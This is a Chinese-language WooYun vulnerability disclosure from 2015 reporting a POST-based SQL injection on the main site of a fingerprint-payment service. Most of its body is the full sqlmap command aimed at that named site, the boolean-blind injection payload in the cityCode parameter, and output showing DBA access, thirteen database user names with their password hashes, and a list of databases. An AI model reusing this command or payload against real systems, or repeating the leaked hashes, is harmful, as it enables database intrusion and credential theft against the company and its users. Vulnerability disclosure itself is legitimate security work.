当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154495

漏洞标题:上海立佰趣信息科技有限公司指付通主站存在POST型SQL注射漏洞(DBA权限+13名系统管理员密码泄露)

相关厂商:上海立佰趣信息科技有限公司

漏洞作者: 路人甲

提交时间:2015-11-20 18:17

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-20: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

“上海立佰趣信息科技有限公司”(公司品牌“立佰趣”,英文品牌“Live By Touch”)成立于2006年2月,是一家以生物识别技术为核心的应用运营公司。目前公司已与中金(CICC)、君联(Legend Capital)、鼎晖投资(CDH)等世界一流中资财团进行战略合作。 立佰趣(Live By Touch)认为指纹鉴定学代表了芯片和密码之后的发展方向,凭借拥有世界排名前三位的核心指纹应用技术,与国内外诸多商业银行、知名商户及各行业合作伙伴进行全方位的合作,致力于推行无需任何介质的生物认证体系,从而弥补目前社会通行的介质认证体系所存在的一些缺憾。作为一家以生物识别技术为核心的应用运营公司,不断研发新的应用产品。目前,公司已经推出具有世界最先进水平的第一个生物识别技术应用产品:指付通(Pay By Finger)。该项目已于2010年开始正式运营。

详细说明:

地址:http://www.paybyfinger.com.cn

python sqlmap.py -u "http://www.paybyfinger.com.cn" -p cityCode --technique=B --form --random-agent --batch --current-user --is-dba --users --passwords --dbs

漏洞证明:

---
Parameter: cityCode (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: homeinputusername=%E6%90%9C%E7%B4%A2%E5%95%86%E6%88%B7%E5%90%8D,%E5%9C%B0%E5%9D%80,%E5%88%86%E7%B1%BB%E7%AD%89&codeKey=ljxD&selectkey=&curPage=1&cityCode=0021' AND 9624=9624 AND 'HHvX'='HHvX
---
web application technology: Apache, JSP
back-end DBMS: Oracle
current user: 'FPS'
current user is DBA: True
database management system users [13]:
[*] ALGORITHM
[*] DBSNMP
[*] FPS
[*] OUTLN
[*] PERFSTAT
[*] PLATFORM
[*] POINT
[*] STRMADMIN
[*] SYS
[*] SYSTEM
[*] WMSYS
[*] ZABBIX
[*] ZCT
database management system users password hashes:
[*] ALGORITHM [1]:
password hash: 695B6259730A64FB
[*] DBSNMP [1]:
password hash: E066D214D5421CCC
[*] FPS [1]:
password hash: DC56B518968A5AE9
[*] OUTLN [1]:
password hash: 4A3BA55E08595C81
[*] PERFSTAT [1]:
password hash: 626A176E28C6CE55
[*] PLATFORM [1]:
password hash: F8BC038657845D39
[*] POINT [1]:
password hash: 7817F30648C47299
[*] STRMADMIN [1]:
password hash: F7737B6F005CD1A1
[*] SYS [1]:
password hash: BFE77DD10B99747E
[*] SYSTEM [1]:
password hash: 420A4FCE8EDB1662
[*] WMSYS [1]:
password hash: 7C9BA362F8314299
[*] ZABBIX [1]:
password hash: 701322E64241BE07
[*] ZCT [1]:
password hash: 1E67C73BCC1D7FE7
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cityCode (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: homeinputusername=%E6%90%9C%E7%B4%A2%E5%95%86%E6%88%B7%E5%90%8D,%E5%9C%B0%E5%9D%80,%E5%88%86%E7%B1%BB%E7%AD%89&codeKey=ljxD&selectkey=&curPage=1&cityCode=0021' AND 9624=9624 AND 'HHvX'='HHvX
---
web application technology: Apache, JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cityCode (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: homeinputusername=%E6%90%9C%E7%B4%A2%E5%95%86%E6%88%B7%E5%90%8D,%E5%9C%B0%E5%9D%80,%E5%88%86%E7%B1%BB%E7%AD%89&codeKey=ljxD&selectkey=&curPage=1&cityCode=0021' AND 9624=9624 AND 'HHvX'='HHvX
---
web application technology: Apache, JSP
back-end DBMS: Oracle
available databases [10]:
[*] ALGORITHM
[*] FPS
[*] OUTLN
[*] PERFSTAT
[*] PLATFORM
[*] POINT
[*] STRMADMIN
[*] SYS
[*] SYSTEM
[*] WMSYS

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝